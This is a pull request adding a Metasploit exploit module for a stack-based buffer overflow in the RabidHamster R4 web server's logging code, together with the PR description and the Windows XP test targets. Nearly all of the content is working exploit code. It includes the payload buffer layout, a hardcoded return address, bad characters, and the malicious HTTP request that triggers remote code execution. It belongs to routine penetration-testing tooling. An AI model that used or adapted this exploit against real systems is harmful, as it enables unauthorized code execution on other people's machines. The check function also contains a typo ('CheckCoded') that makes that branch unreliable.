### PR TITLE
Add OSVDB-79007 - RabidHamster R4 Log Entry BoF

### DIFF
--- a/modules/exploits/windows/http/rabidhamster_r4_log.rb
+++ b/modules/exploits/windows/http/rabidhamster_r4_log.rb
@@ -1,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a vulnerability found in RabidHamster R4's web server.
+				By supplying a malformed HTTP request, it is possible to trigger a stack-based
+				buffer overflow when generating a log, which may result in arbitrary code
+				execution under the context of the user.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Luigi Auriemma',  #Discovery, PoC
+					'sinn3r'           #Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '79007'],
+					['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
+					['URL', 'http://secunia.com/advisories/47901/']
+				],
+			'Payload'        =>
+				{
+					'StackAdjustment' => -3500,
+					'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "process"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['R4 v1.25', {'Ret'=>0x73790533}]  #JMP ESI (ddraw.dll)
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Feb 09 2012",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptPort.new('RPORT', [true, 'The remote port', 8888])
+				], self.class)
+	end
+
+	def check
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => '/'
+		})
+
+		if res and res.headers['Server'] == 'R4 Embedded Server'
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCoded::Safe
+		end
+	end
+
+	def exploit
+		buf = ''
+		buf << payload.encoded
+		buf << rand_text_alpha(2022-buf.length, payload_badchars)
+		buf << [target.ret].pack("V*")
+		buf << pattern_create(200)
+		buf << rand_text_alpha(3000-buf.length, payload_badchars)
+
+		send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "/?#{buf}"
+		})
+	end
+end


### PR DESCRIPTION
This module exploits a vulnerability found in RabidHamster R4's web server. By supplying a malformed HTTP request, it is possible to trigger a stack-based buffer overflow when generating a log, which may result in arbitrary code execution under the context of the user.

Note: Despite the fact ddraw.dll comes from Windows\System32\, the version still remains the same under these test environments:
- Win XP SP3 unpatched
- Win XP SP3 fully patched
- Win XP SP3 fully patched + Office 2007 installed
